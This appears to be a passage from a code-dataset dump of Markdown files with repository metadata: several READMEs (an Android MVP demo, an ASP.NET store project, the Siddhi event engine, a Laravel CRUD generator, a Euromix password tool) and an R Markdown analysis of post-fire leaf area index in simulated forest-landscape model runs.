locationType: Please contact for drive-thru/walk-in availability.
phone: "816-795-6000"
website: "https://www.solvhealth.com/urgent-care-of-kansas-city-independence-mo-AGLeep"
onlineBooking: true
closed: undefined
closedUpdate: June 30th, 2020
notes: "By appointment only. Requires doctor's referral."
days: Weekdays
hours: 8:30AM-9PM
altDays: Sundays
altHours: 8:30AM-5PM
alt2Days: Saturdays
alt2Hours: 8:30AM-6PM
ctaMessage: Schedule a test
ctaUrl: "https://www.solvhealth.com/urgent-care-of-kansas-city-independence-mo-AGLeep"
--- | 91.382353 | 1,988 | 0.814612 | yue_Hant | 0.376268 |
14a1009f60bb03c1599e8fa3ca3eeb72c7e06ee4 | 167 | md | Markdown | README.md | ali-taghizadeh/android_mvp | a074e82915c38e68c0f8d3533e33a4bb438f33ed | [
"Apache-2.0"
] | 1 | 2019-08-19T07:38:15.000Z | 2019-08-19T07:38:15.000Z | README.md | ali-taghizadeh/Android_mvp | a074e82915c38e68c0f8d3533e33a4bb438f33ed | [
"Apache-2.0"
] | null | null | null | README.md | ali-taghizadeh/Android_mvp | a074e82915c38e68c0f8d3533e33a4bb438f33ed | [
"Apache-2.0"
] | null | null | null | # android_mvp
This repository is all about implementing MVP architecture in a simple Android app using Rxjava2 and Realm
<img src="images/Screenshot.png" width="200">
| 41.75 | 106 | 0.802395 | eng_Latn | 0.957249 |
14a26aa526ad743e892882079b0458a3aeb37e83 | 1,894 | md | Markdown | README.md | 03012021-dotnet-uta/BeauCrumley_p1 | 008ea8940f95eed2c69a9a83b02037242d104f1b | [
"MIT"
] | null | null | null | README.md | 03012021-dotnet-uta/BeauCrumley_p1 | 008ea8940f95eed2c69a9a83b02037242d104f1b | [
"MIT"
] | null | null | null | README.md | 03012021-dotnet-uta/BeauCrumley_p1 | 008ea8940f95eed2c69a9a83b02037242d104f1b | [
"MIT"
] | null | null | null | # <img src="BeauCrumley_p1/wwwroot/favicon.png" alt="BEE Logo" width="50"/>Beau's Electronics Emporium
## Project Description
Beau's Electronics Emporium is a concept for an e-commerce platform that could be used by an electronics hobby store. Included are much of the basic functionallity one might expect from an online store: User accounts, store pages with a display of products, and a functioning shoopping cart. The application is powered by ASP.NET Core and uses a web API to serve static pages to the client.
## Technologies Used
* ASP.NET Core Web API
* Entity Framework Core
* C#, JavaScript/HTML/CSS, SQL
## Features
* Register new accounts and login.
* Browse products of a store.
* Add/remove items from cart.
* Have order total viewable any time.
* Place orders that automatically update the inventory levels of a store.
To-do list:
* Store selection page.
* Displaying order history of a logged in user.
* (Admin) Display/Sort/Filter all orders by store/product/revenue/customer/etc.
## Getting Started
1. git clone [https://github.com/03012021-dotnet-uta/BeauCrumley_p1.git](https://github.com/03012021-dotnet-uta/BeauCrumley_p1/ "Project Repository")
2. In order to get the project up and running a database will need to be created. Included in the `./Repository/Data/` folder is a file, `DatabaseSetup.sql`, that should have everything needed to create and seed a database to get started.
3. Open a CLI and make sure it is pointed at the `./BeauCrumley_p1/` directory and run the following command: `dotnet run`.
* NOTE: If there is an issue executing the command, ensure the .NET CLI is installed. Learn more at [Microsoft](https://dotnet.microsoft.com/download ".NET Download")
4. Once the build has completed open a browser at `localhost:5001`.
## License
This project uses the following license: [MIT License](https://mit-license.org/ "MIT License").
| 51.189189 | 391 | 0.763992 | eng_Latn | 0.988249 |
14a347684cb364db71c240572e2270028b1d6dd1 | 4,518 | md | Markdown | README.md | arosharodrigo/siddhi-4.0.0 | 420e078b4c2545ea5e457429eb56414a7a7aed4e | [
"Apache-2.0"
] | null | null | null | README.md | arosharodrigo/siddhi-4.0.0 | 420e078b4c2545ea5e457429eb56414a7a7aed4e | [
"Apache-2.0"
] | null | null | null | README.md | arosharodrigo/siddhi-4.0.0 | 420e078b4c2545ea5e457429eb56414a7a7aed4e | [
"Apache-2.0"
] | null | null | null | Siddhi Complex Event Processing Engine
======================================
---
| Branch | Build Status |
| :------------ |:-------------
| master | [](https://wso2.org/jenkins/job/siddhi__java8 )|
---
##### New version of Siddhi v4.0.0 is built in Java 8.
##### Latest Released Version v3.0.5.
For all releases see https://github.com/wso2/siddhi/releases
Siddhi CEP is a lightweight, easy-to-use Open Source Complex Event Processing Engine (CEP) released as a Java Library under Apache Software License v2.0. Siddhi CEP processes events which are generated by various event sources, analyses them and notifies appropriate complex events according to the user specified queries.
This project was initiated as a research project at University of Moratuwa, Sri Lanka, and now being improved by WSO2 Inc.
####Documentation
https://docs.wso2.com/display/CEP420/SiddhiQL+Guide+3.1
####Try it with [WSO2 Complex Event Processor 4.2] (http://wso2.com/products/complex-event-processor/)
https://docs.wso2.com/display/CEP420/Siddhi+Try+It+Tool
Features Supported
------------------
- Filter
- Multiple filter conditions can be defined
- Filters can be applied before and/or after Window operations
- Join
- Supports joining two streams into one based on a condition
- Match operation triggering can be configured (making "left" or "right" or both streams to trigger)
- Supports Left, Right & Full Outer Joins and Inner Join
- Aggregation
- By default shipped with Avg, Sum , Min, Max, etc
- Supports Custom Aggregations via its pluggable architecture
- Group by
- Supports Group by based on more than one attribute
- Supported for all type of queries
- Having
- Supported for all type of queries
- Window
- Default implementations to Windows are: Time Window, Time Batch Window, Length Window, Unique Window, etc
- Supports Window operators via the pluggable architecture
- Conditions and Expressions
- Supporting condition and expression evaluation
- Conditions supported are: and, or, not, ==,!=, >=, >, <=, <, and arithmetic operations
- Attributes supported are: boolean, string, int, long, float, double, object
- Expressions can be implemented as extensions via Siddhi's pluggable architecture
- Pattern processing
- Identifies pattern occurrences within streams
- Supports "every" conditions
- Can temporally process any amount of events from streams with followed-by (->) operation
- Can process two stream at the same time via "and" and "or" conditions
- Can collect multiple number of events, with min and max limit, using "count" condition
- Sequence processing
- Identifies continuous sequence of events from streams
- Can process two stream at the same time using "or" conditions on streams
- Supports zero to many, one to many, and zero to one conditions
- Event Tables
- Support for using historical data in realtime processing
- Can process with the in-memory, RDBMS or Hazelcast(In-memory data grid) based data collection
- Partitions
- Supports query partitions based on key words and value ranges
- Multiple queries can be grouped within a partition
- Scripting
- Support JavaScript & Scala Scripts within Siddhi Queries
- Query Language
- SQL like query language
- Implemented on Antlr4
- Supports Query, Stream Definition and Query Plan compilation
System Requirements
-------------------
1. Minimum memory - 500 MB (based on in-memory data stored for processing)
2. Processor - Pentium 800MHz or equivalent at minimum
3. Java SE Development Kit 1.7 or higher
4. To build Siddhi CEP from the Source distribution, it is necessary that you have
JDK 1.7 version or later and Maven 3.0.4 or later
## Questions
* Questions are welcomed & we are happy to help you integrate Siddhi to your project :)
* Post your questions on http://stackoverflow.com/ tagging ["siddhi"] (http://stackoverflow.com/search?q=siddhi)
## How to Contribute
* Please report issues at [Siddhi JIRA] (https://wso2.org/jira/browse/SIDDHI)
* Send your bug fixes pull requests to [master branch] (https://github.com/wso2/carbon-event-processing/tree/master)
## Contact us
Siddhi developers can be contacted via the mailing lists:
* Carbon Developers List : dev@wso2.org
* Carbon Architecture List : architecture@wso2.org
####We welcome your feedback and contribution.
Siddhi CEP Team
| 44.732673 | 322 | 0.727534 | eng_Latn | 0.975721 |
14a44f8923d84fc2d894e858f958310995e99792 | 1,364 | md | Markdown | doc/installation.md | sagor110090/Curd | 2bba87886d58c69e08960a6f2091f7ca6794fc23 | [
"MIT"
] | 1 | 2021-09-12T19:31:43.000Z | 2021-09-12T19:31:43.000Z | doc/installation.md | sagor110090/crud-generator | 44e7f7e41c065552e2b3c7ab1230fda37db83a58 | [
"MIT"
] | null | null | null | doc/installation.md | sagor110090/crud-generator | 44e7f7e41c065552e2b3c7ab1230fda37db83a58 | [
"MIT"
] | null | null | null | ## Installation
To get started, you should add the `sagor110090/crud-generator` Composer dependency to your project:
```
composer require sagor110090/crud-generator --dev
```
Once the package is installed, you should register the `Sagor1100090\CrudGenerator\CrudGeneratorServiceProvider` service provider. Normally, Laravel 5.5+ will register the service provider automatically.
After that, publish its assets using the `vendor:publish` Artisan command:
```
php artisan vendor:publish --provider="sagor110090\CrudGenerator\CrudGeneratorServiceProvider"
```
### Laravel older 5.5
If you're using an older verson of Laravel (<5.5) then just manually add the provider to `app/Providers/AppServiceProvider.php` file.
```php
public function register()
{
if ($this->app->environment() == 'local') {
$this->app->register('Sagor1100090\CrudGenerator\CrudGeneratorServiceProvider');
}
}
```
And since, we're using `laravelcollective/html` as dependency you should add its service provider in the `config/app.php` file. Check the [docs](https://laravelcollective.com/docs/master/html) for details.
```php
'providers' => [
//...
Collective\Html\HtmlServiceProvider::class,
],
'aliases' => [
//...
'Form' => Collective\Html\FormFacade::class,
'HTML' => Collective\Html\HtmlFacade::class,
],
```
[← Back to index](README.md)
| 30.311111 | 205 | 0.730938 | eng_Latn | 0.749993 |
14a52073ab5a57146c59b3ce144a6a0ecaedcc3f | 549 | md | Markdown | README.md | wtuemura/euromix_irpass | 492637ae407259dda3fc7dd96309db91ac12222d | [
"MIT"
] | null | null | null | README.md | wtuemura/euromix_irpass | 492637ae407259dda3fc7dd96309db91ac12222d | [
"MIT"
] | null | null | null | README.md | wtuemura/euromix_irpass | 492637ae407259dda3fc7dd96309db91ac12222d | [
"MIT"
] | 1 | 2021-09-23T00:31:48.000Z | 2021-09-23T00:31:48.000Z | # euromix_irpass
Dancing Stage Euromix - Internet Challenge password generator
Web version: https://987123879113.github.io/euromix_irpass/
## Usage
```
usage: keygen.py [-h] [--license LICENSE]
optional arguments:
-h, --help show this help message and exit
--license LICENSE, -k LICENSE
Machine license key
```
## Building Javascript
Note: pscript is required to build the kicpass.js file required for the webpage.
```
python3 -c "import pscript; pscript.script2js('kicpass.py')"
```
| 24.954545 | 81 | 0.664845 | eng_Latn | 0.535401 |
14a584edce24a4f77d56e07349da45a90bc8d16d | 67,125 | md | Markdown | Research_Projects/Delayed Mortality/Outputs/readme.md | kmcquil/Project-Southern-Appalachians-2018 | 7ff66e8028d060e0e3418e56e128652e839eb53f | [
"Apache-2.0"
] | null | null | null | Research_Projects/Delayed Mortality/Outputs/readme.md | kmcquil/Project-Southern-Appalachians-2018 | 7ff66e8028d060e0e3418e56e128652e839eb53f | [
"Apache-2.0"
] | null | null | null | Research_Projects/Delayed Mortality/Outputs/readme.md | kmcquil/Project-Southern-Appalachians-2018 | 7ff66e8028d060e0e3418e56e128652e839eb53f | [
"Apache-2.0"
] | 1 | 2022-03-14T16:09:23.000Z | 2022-03-14T16:09:23.000Z | Fire\_Analysis
================
Zjrobbin
12/22/2020
``` r
library(dplyr)
```
##
## Attaching package: 'dplyr'
## The following objects are masked from 'package:stats':
##
## filter, lag
## The following objects are masked from 'package:base':
##
## intersect, setdiff, setequal, union
``` r
library(ggplot2)
library(ggpubr)
```
## Warning: package 'ggpubr' was built under R version 4.0.3
``` r
library(grid)
require(gridExtra)
```
## Loading required package: gridExtra
##
## Attaching package: 'gridExtra'
## The following object is masked from 'package:dplyr':
##
## combine
``` r
library(raster)
```
## Loading required package: sp
##
## Attaching package: 'raster'
## The following object is masked from 'package:ggpubr':
##
## rotate
## The following object is masked from 'package:dplyr':
##
## select
``` r
library(RColorBrewer)
rdbu<-brewer.pal(10,"RdBu")
Greens<-brewer.pal(9,"Greens")
```
``` r
ProcessLAI<-function(t,LANDIS_Inputs){
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
Fire1[Fire1<=1]<-NA
Fire1[Fire1>1]<-1
LAITOF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',as.character(t-1),'.img'))*Fire1
LAIAF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t,'.img'))*Fire1
LAI10YAF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t+5,'.img'))*Fire1
LAI15YAR<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t+10,'.img'))*Fire1
values0<-as.data.frame(LAITOF$layer)%>%subset(!is.na(layer))
values1<-as.data.frame(LAIAF$layer)%>%subset(!is.na(layer))
values2<-as.data.frame(LAI10YAF$layer)%>%subset(!is.na(layer))
values3<-as.data.frame(LAI15YAR$layer)%>%subset(!is.na(layer))
#values4<-as.data.frame(LAI4$layer)%>%subset(!is.na(layer))
#values5<-as.data.frame(LAI5$layer)%>%subset(!is.na(layer))
delta<-LAIAF-LAITOF
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
#par(bg="grey")
#plot(delta,ylim=c(0,400),xlim=c(0,400),col=rdbu,zlim=c(-8,8),colNA="darkgrey")
data<-data.frame(name=c(rep(" Pre-burn",length(values0$layer)),rep(" Post-burn",length(values1$layer)),rep(" 5 yrs Post-burn",length(values2$layer)),rep("10 yrs Post-burn",length(values3$layer))),
value=c(values0$layer,values1$layer,values2$layer,values3$layer))
return(data)
}
ProcessLAINF<-function(t,LANDIS_Inputs){
#plot(Fire1,ylim=c(0,400),xlim=c(0,400))
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
Fire1[Fire1!=1]<-NA
LAITOF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',as.character(t-1),'.img'))*Fire1
LAIAF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t+3,'.img'))*Fire1
LAI10YAF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t+5,'.img'))*Fire1
LAI15YAR<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t+10,'.img'))*Fire1
values0<-as.data.frame(LAITOF$layer)%>%subset(!is.na(layer))
values1<-as.data.frame(LAIAF$layer)%>%subset(!is.na(layer))
values2<-as.data.frame(LAI10YAF$layer)%>%subset(!is.na(layer))
values3<-as.data.frame(LAI15YAR$layer)%>%subset(!is.na(layer))
#values4<-as.data.frame(LAI4$layer)%>%subset(!is.na(layer))
#values5<-as.data.frame(LAI5$layer)%>%subset(!is.na(layer))
delta<-LAIAF-LAITOF
#par(bg="grey")
#plot(delta,ylim=c(0,400),xlim=c(0,400),col=rdbu,zlim=c(-8,8),colNA="darkgrey")
data<-data.frame(name=c(rep(" Pre-burn",length(values0$layer)),rep(" Post-burn",length(values1$layer)),rep(" 5 yrs Post-burn",length(values2$layer)),rep("10 yrs Post-burn",length(values3$layer))),
value=c(values0$layer,values1$layer,values2$layer,values3$layer))
return(data)
}
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D1_R2/"
LANDIS_Inputs2<-"E:/DM_runs_4_4/GA_Model_D2_R2/"
LANDIS_Inputs3<-"E:/DM_runs_4_4/GA_Model_D3_R2/"
LANDIS_Inputs4<-"E:/DM_runs_4_4/GA_Model_D4_R2/"
LANDIS_Inputs5<-"E:/DM_runs_4_4/GA_Model_D5_R2/"
mod1Year2<-ProcessLAI(2,LANDIS_Inputs)
mod1Year3<-ProcessLAI(3,LANDIS_Inputs)
mod1Year4<-ProcessLAI(4,LANDIS_Inputs)
mod1Year5<-ProcessLAI(5,LANDIS_Inputs)
mod1Year6<-ProcessLAI(6,LANDIS_Inputs)
mod1Year7<-ProcessLAI(7,LANDIS_Inputs)
mod1Year8<-ProcessLAI(8,LANDIS_Inputs)
mod1Year9<-ProcessLAI(9,LANDIS_Inputs)
mod1Year10<-ProcessLAI(10,LANDIS_Inputs)
mod1Year11<-ProcessLAI(11,LANDIS_Inputs)
mod2Year2<-ProcessLAI(2,LANDIS_Inputs2)
mod2Year3<-ProcessLAI(3,LANDIS_Inputs2)
mod2Year4<-ProcessLAI(4,LANDIS_Inputs2)
mod2Year5<-ProcessLAI(5,LANDIS_Inputs2)
mod2Year6<-ProcessLAI(6,LANDIS_Inputs2)
mod2Year7<-ProcessLAI(7,LANDIS_Inputs2)
mod2Year8<-ProcessLAI(8,LANDIS_Inputs2)
mod2Year9<-ProcessLAI(9,LANDIS_Inputs2)
mod2Year10<-ProcessLAI(10,LANDIS_Inputs2)
mod2Year11<-ProcessLAI(11,LANDIS_Inputs2)
mod3Year2<-ProcessLAI(2,LANDIS_Inputs3)
mod3Year3<-ProcessLAI(3,LANDIS_Inputs3)
mod3Year4<-ProcessLAI(4,LANDIS_Inputs3)
mod3Year5<-ProcessLAI(5,LANDIS_Inputs3)
mod3Year6<-ProcessLAI(6,LANDIS_Inputs3)
mod3Year7<-ProcessLAI(7,LANDIS_Inputs3)
mod3Year8<-ProcessLAI(8,LANDIS_Inputs3)
mod3Year9<-ProcessLAI(9,LANDIS_Inputs3)
mod3Year10<-ProcessLAI(10,LANDIS_Inputs3)
mod3Year11<-ProcessLAI(11,LANDIS_Inputs3)
mod4Year2<-ProcessLAI(2,LANDIS_Inputs4)
mod4Year3<-ProcessLAI(3,LANDIS_Inputs4)
mod4Year4<-ProcessLAI(4,LANDIS_Inputs4)
mod4Year5<-ProcessLAI(5,LANDIS_Inputs4)
mod4Year6<-ProcessLAI(6,LANDIS_Inputs4)
mod4Year7<-ProcessLAI(7,LANDIS_Inputs4)
mod4Year8<-ProcessLAI(8,LANDIS_Inputs4)
mod4Year9<-ProcessLAI(9,LANDIS_Inputs4)
mod4Year10<-ProcessLAI(10,LANDIS_Inputs4)
mod4Year11<-ProcessLAI(11,LANDIS_Inputs4)
mod5Year2<-ProcessLAI(2,LANDIS_Inputs5)
mod5Year3<-ProcessLAI(3,LANDIS_Inputs5)
mod5Year4<-ProcessLAI(4,LANDIS_Inputs5)
mod5Year5<-ProcessLAI(5,LANDIS_Inputs5)
mod5Year6<-ProcessLAI(6,LANDIS_Inputs5)
mod5Year7<-ProcessLAI(7,LANDIS_Inputs5)
mod5Year8<-ProcessLAI(8,LANDIS_Inputs5)
mod5Year9<-ProcessLAI(9,LANDIS_Inputs5)
mod5Year10<-ProcessLAI(10,LANDIS_Inputs5)
mod5Year11<-ProcessLAI(11,LANDIS_Inputs5)
Stack_D<-rbind(mod1Year2,mod1Year3,mod1Year4,mod1Year5,mod1Year6,
mod1Year7,mod1Year8,mod1Year9,mod1Year10,mod1Year11,
mod2Year2,mod2Year3,mod2Year4,mod2Year5,mod2Year6,
mod2Year7,mod2Year8,mod2Year9,mod2Year10,mod2Year11,
mod3Year2,mod3Year3,mod3Year4,mod3Year5,mod3Year6,
mod3Year7,mod3Year8,mod3Year9,mod3Year10,mod3Year11,
mod4Year2,mod4Year3,mod4Year4,mod4Year5,mod4Year6,
mod4Year7,mod4Year8,mod4Year9,mod4Year10,mod4Year11,
mod5Year2,mod5Year3,mod5Year4,mod5Year5,mod5Year6,
mod5Year7,mod5Year8,mod5Year9,mod5Year10,mod5Year11)
Stack_D$model<-"Delay"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_ND1_R2/"
LANDIS_Inputs2<-"E:/DM_runs_4_4/GA_Model_ND2_R2/"
LANDIS_Inputs3<-"E:/DM_runs_4_4/GA_Model_ND3_R2/"
LANDIS_Inputs4<-"E:/DM_runs_4_4/GA_Model_ND4_R2/"
LANDIS_Inputs5<-"E:/DM_runs_4_4/GA_Model_ND5_R2/"
mod1Year2<-ProcessLAI(2,LANDIS_Inputs)
mod1Year3<-ProcessLAI(3,LANDIS_Inputs)
mod1Year4<-ProcessLAI(4,LANDIS_Inputs)
mod1Year5<-ProcessLAI(5,LANDIS_Inputs)
mod1Year6<-ProcessLAI(6,LANDIS_Inputs)
mod1Year7<-ProcessLAI(7,LANDIS_Inputs)
mod1Year8<-ProcessLAI(8,LANDIS_Inputs)
mod1Year9<-ProcessLAI(9,LANDIS_Inputs)
mod1Year10<-ProcessLAI(10,LANDIS_Inputs)
mod1Year11<-ProcessLAI(11,LANDIS_Inputs)
mod2Year2<-ProcessLAI(2,LANDIS_Inputs2)
mod2Year3<-ProcessLAI(3,LANDIS_Inputs2)
mod2Year4<-ProcessLAI(4,LANDIS_Inputs2)
mod2Year5<-ProcessLAI(5,LANDIS_Inputs2)
mod2Year6<-ProcessLAI(6,LANDIS_Inputs2)
mod2Year7<-ProcessLAI(7,LANDIS_Inputs2)
mod2Year8<-ProcessLAI(8,LANDIS_Inputs2)
mod2Year9<-ProcessLAI(9,LANDIS_Inputs2)
mod2Year10<-ProcessLAI(10,LANDIS_Inputs2)
mod2Year11<-ProcessLAI(11,LANDIS_Inputs2)
mod3Year2<-ProcessLAI(2,LANDIS_Inputs3)
mod3Year3<-ProcessLAI(3,LANDIS_Inputs3)
mod3Year4<-ProcessLAI(4,LANDIS_Inputs3)
mod3Year5<-ProcessLAI(5,LANDIS_Inputs3)
mod3Year6<-ProcessLAI(6,LANDIS_Inputs3)
mod3Year7<-ProcessLAI(7,LANDIS_Inputs3)
mod3Year8<-ProcessLAI(8,LANDIS_Inputs3)
mod3Year9<-ProcessLAI(9,LANDIS_Inputs3)
mod3Year10<-ProcessLAI(10,LANDIS_Inputs3)
mod3Year11<-ProcessLAI(11,LANDIS_Inputs3)
mod4Year2<-ProcessLAI(2,LANDIS_Inputs4)
mod4Year3<-ProcessLAI(3,LANDIS_Inputs4)
mod4Year4<-ProcessLAI(4,LANDIS_Inputs4)
mod4Year5<-ProcessLAI(5,LANDIS_Inputs4)
mod4Year6<-ProcessLAI(6,LANDIS_Inputs4)
mod4Year7<-ProcessLAI(7,LANDIS_Inputs4)
mod4Year8<-ProcessLAI(8,LANDIS_Inputs4)
mod4Year9<-ProcessLAI(9,LANDIS_Inputs4)
mod4Year10<-ProcessLAI(10,LANDIS_Inputs4)
mod4Year11<-ProcessLAI(11,LANDIS_Inputs4)
mod5Year2<-ProcessLAI(2,LANDIS_Inputs5)
mod5Year3<-ProcessLAI(3,LANDIS_Inputs5)
mod5Year4<-ProcessLAI(4,LANDIS_Inputs5)
mod5Year5<-ProcessLAI(5,LANDIS_Inputs5)
mod5Year6<-ProcessLAI(6,LANDIS_Inputs5)
mod5Year7<-ProcessLAI(7,LANDIS_Inputs5)
mod5Year8<-ProcessLAI(8,LANDIS_Inputs5)
mod5Year9<-ProcessLAI(9,LANDIS_Inputs5)
mod5Year10<-ProcessLAI(10,LANDIS_Inputs5)
mod5Year11<-ProcessLAI(11,LANDIS_Inputs5)
Stack_ND<-rbind(mod1Year2,mod1Year3,mod1Year4,mod1Year5,mod1Year6,
mod1Year7,mod1Year8,mod1Year9,mod1Year10,mod1Year11,
mod2Year2,mod2Year3,mod2Year4,mod2Year5,mod2Year6,
mod2Year7,mod2Year8,mod2Year9,mod2Year10,mod2Year11,
mod3Year2,mod3Year3,mod3Year4,mod3Year5,mod3Year6,
mod3Year7,mod3Year8,mod3Year9,mod3Year10,mod3Year11,
mod4Year2,mod4Year3,mod4Year4,mod4Year5,mod4Year6,
mod4Year7,mod4Year8,mod4Year9,mod4Year10,mod4Year11,
mod5Year2,mod5Year3,mod5Year4,mod5Year5,mod5Year6,
mod5Year7,mod5Year8,mod5Year9,mod5Year10,mod5Year11)
Stack_ND$model<-"No Delay"
mod1Year2<-ProcessLAINF(2,LANDIS_Inputs)
mod1Year3<-ProcessLAINF(3,LANDIS_Inputs)
mod1Year4<-ProcessLAINF(4,LANDIS_Inputs)
mod1Year5<-ProcessLAINF(5,LANDIS_Inputs)
mod1Year6<-ProcessLAINF(6,LANDIS_Inputs)
mod1Year7<-ProcessLAINF(7,LANDIS_Inputs)
mod1Year8<-ProcessLAINF(8,LANDIS_Inputs)
mod1Year9<-ProcessLAINF(9,LANDIS_Inputs)
mod1Year10<-ProcessLAINF(10,LANDIS_Inputs)
mod1Year11<-ProcessLAINF(11,LANDIS_Inputs)
mod2Year2<-ProcessLAINF(2,LANDIS_Inputs2)
mod2Year3<-ProcessLAINF(3,LANDIS_Inputs2)
mod2Year4<-ProcessLAINF(4,LANDIS_Inputs2)
mod2Year5<-ProcessLAINF(5,LANDIS_Inputs2)
mod2Year6<-ProcessLAINF(6,LANDIS_Inputs2)
mod2Year7<-ProcessLAINF(7,LANDIS_Inputs2)
mod2Year8<-ProcessLAINF(8,LANDIS_Inputs2)
mod2Year9<-ProcessLAINF(9,LANDIS_Inputs2)
mod2Year10<-ProcessLAINF(10,LANDIS_Inputs2)
mod2Year11<-ProcessLAINF(11,LANDIS_Inputs2)
mod3Year2<-ProcessLAINF(2,LANDIS_Inputs3)
mod3Year3<-ProcessLAINF(3,LANDIS_Inputs3)
mod3Year4<-ProcessLAINF(4,LANDIS_Inputs3)
mod3Year5<-ProcessLAINF(5,LANDIS_Inputs3)
mod3Year6<-ProcessLAINF(6,LANDIS_Inputs3)
mod3Year7<-ProcessLAINF(7,LANDIS_Inputs3)
mod3Year8<-ProcessLAINF(8,LANDIS_Inputs3)
mod3Year9<-ProcessLAINF(9,LANDIS_Inputs3)
mod3Year10<-ProcessLAINF(10,LANDIS_Inputs3)
mod3Year11<-ProcessLAINF(11,LANDIS_Inputs3)
mod4Year2<-ProcessLAINF(2,LANDIS_Inputs4)
mod4Year3<-ProcessLAINF(3,LANDIS_Inputs4)
mod4Year4<-ProcessLAINF(4,LANDIS_Inputs4)
mod4Year5<-ProcessLAINF(5,LANDIS_Inputs4)
mod4Year6<-ProcessLAINF(6,LANDIS_Inputs4)
mod4Year7<-ProcessLAINF(7,LANDIS_Inputs4)
mod4Year8<-ProcessLAINF(8,LANDIS_Inputs4)
mod4Year9<-ProcessLAINF(9,LANDIS_Inputs4)
mod4Year10<-ProcessLAINF(10,LANDIS_Inputs4)
mod4Year11<-ProcessLAINF(11,LANDIS_Inputs4)
mod5Year2<-ProcessLAINF(2,LANDIS_Inputs5)
mod5Year3<-ProcessLAINF(3,LANDIS_Inputs5)
mod5Year4<-ProcessLAINF(4,LANDIS_Inputs5)
mod5Year5<-ProcessLAINF(5,LANDIS_Inputs5)
mod5Year6<-ProcessLAINF(6,LANDIS_Inputs5)
mod5Year7<-ProcessLAINF(7,LANDIS_Inputs5)
mod5Year8<-ProcessLAINF(8,LANDIS_Inputs5)
mod5Year9<-ProcessLAINF(9,LANDIS_Inputs5)
mod5Year10<-ProcessLAINF(10,LANDIS_Inputs5)
mod5Year11<-ProcessLAINF(11,LANDIS_Inputs5)
Stack_C<-rbind(mod1Year2,mod1Year3,mod1Year4,mod1Year5,mod1Year6,
mod1Year7,mod1Year8,mod1Year9,mod1Year10,mod1Year11,
mod2Year2,mod2Year3,mod2Year4,mod2Year5,mod2Year6,
mod2Year7,mod2Year8,mod2Year9,mod2Year10,mod2Year11,
mod3Year2,mod3Year3,mod3Year4,mod3Year5,mod3Year6,
mod3Year7,mod3Year8,mod3Year9,mod3Year10,mod3Year11,
mod4Year2,mod4Year3,mod4Year4,mod4Year5,mod4Year6,
mod4Year7,mod4Year8,mod4Year9,mod4Year10,mod4Year11,
mod5Year2,mod5Year3,mod5Year4,mod5Year5,mod5Year6,
mod5Year7,mod5Year8,mod5Year9,mod5Year10,mod5Year11)
Stack_C$model<-"Undisturbed"
LAIStack<-rbind(Stack_D,Stack_ND,Stack_C)
write.csv(LAIStack,"LAIStack_4_28.csv")
```
``` r
LAIStack<-read.csv("LAIStack_4_28.csv")
# compare_means(value ~ model, data = LAIStack,
# group.by = "name")
# head(LAIStack)
# unique(LAIStack$name)
PB_D<-LAIStack$value[LAIStack$name==" Pre-burn" & LAIStack$model=="Delay"]
PB_ND<-LAIStack$value[LAIStack$name==" Pre-burn" & LAIStack$model=="No Delay"]
wilcox.test(PB_D,PB_ND)
```
##
## Wilcoxon rank sum test with continuity correction
##
## data: PB_D and PB_ND
## W = 86081198, p-value < 2.2e-16
## alternative hypothesis: true location shift is not equal to 0
``` r
B_D<-LAIStack$value[LAIStack$name==" Post-burn" & LAIStack$model=="Delay"]
B_ND<-LAIStack$value[LAIStack$name==" Post-burn" & LAIStack$model=="No Delay"]
wilcox.test(B_D,B_ND)
```
##
## Wilcoxon rank sum test with continuity correction
##
## data: B_D and B_ND
## W = 67962066, p-value < 2.2e-16
## alternative hypothesis: true location shift is not equal to 0
``` r
five_D<-LAIStack$value[LAIStack$name==" 5 yrs Post-burn" &LAIStack$model=="Delay"]
five_ND<-LAIStack$value[LAIStack$name==" 5 yrs Post-burn" & LAIStack$model=="No Delay"]
wilcox.test(five_D,five_ND)
```
##
## Wilcoxon rank sum test with continuity correction
##
## data: five_D and five_ND
## W = 67879249, p-value < 2.2e-16
## alternative hypothesis: true location shift is not equal to 0
``` r
ten_D<-LAIStack$value[LAIStack$name=="10 yrs Post-burn" &LAIStack$model=="Delay"]
ten_ND<-LAIStack$value[LAIStack$name=="10 yrs Post-burn" & LAIStack$model=="No Delay"]
wilcox.test(five_D,five_ND)
```
##
## Wilcoxon rank sum test with continuity correction
##
## data: five_D and five_ND
## W = 67879249, p-value < 2.2e-16
## alternative hypothesis: true location shift is not equal to 0
``` r
IntoClasses<-transform(LAIStack,group=cut(value,breaks=c(0,2,4,6,8,25),labels=c('0-2 ','2-4','4-6','6-8','>8')))
Delay<-IntoClasses[IntoClasses$model=="Delay",]
unique(IntoClasses$model)
```
## [1] "Delay" "No Delay" "Undisturbed"
``` r
D_Pre<-as.data.frame(table(Delay$group[Delay$name==" Pre-burn"]))
s<-sum(D_Pre[,2])
D_Pre<-as.data.frame(table(Delay$group[Delay$name==" Pre-burn"])/s)
D_Post<-as.data.frame(table(Delay$group[Delay$name==" Post-burn"])/s)
D_5<-as.data.frame(table(Delay$group[Delay$name==" 5 yrs Post-burn"])/s)
D_10<-as.data.frame(table(Delay$group[Delay$name=="10 yrs Post-burn"])/s)
unique(IntoClasses$model)
```
## [1] "Delay" "No Delay" "Undisturbed"
``` r
Und<-IntoClasses[IntoClasses$model=="Undisturbed",]
#unique(Delay$name)
Und_Pre<-as.data.frame(table(Und$group[Und$name==" Pre-burn"]))
s<-sum(Und_Pre[,2])
Und_Pre<-as.data.frame(table(Und$group[Und$name==" Pre-burn"])/s)
Und_Post<-as.data.frame(table(Und$group[Und$name==" Post-burn"])/s)
Und_5<-as.data.frame(table(Und$group[Und$name==" 5 yrs Post-burn"])/s)
Und_10<-as.data.frame(table(Und$group[Und$name=="10 yrs Post-burn"])/s)
